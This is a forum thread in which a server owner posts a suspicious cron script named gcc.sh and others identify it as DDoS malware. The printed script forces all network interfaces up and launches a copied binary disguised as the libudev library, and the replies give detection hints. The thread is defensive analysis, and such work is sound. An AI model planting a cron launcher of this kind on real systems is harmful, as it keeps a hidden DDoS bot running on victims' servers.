I have been experiencing spikes up to 1 Gbps on my server and have been looking for virus' and malware. I found this file: gcc.sh in /etc/cron.hourly and was wondering if anyone has seen anything like it, and would have some insight into the code. Thanks!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
Quite likely. It uses /lib/libudev.so.6 as an executable while the name implies it should be a library - try using a tool like nm or objdump to see if it's an executable. It copies from /lib/libudev.so to .so.6 - while normally the .so is a symlink to the versioned one. It also runs a for loop to bring up all network connections even if you've turned them off. It uses the name of a well-known compiler to look legit. I'd call this 99%+ likely a virus.
Found another reference to something calling itself gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver . And yes, that's a DDoS virus on a unix system, exactly matching your problem.
yes it is.
try using ps -ef | grep -i libudev.so.6 to see the processes used by the program
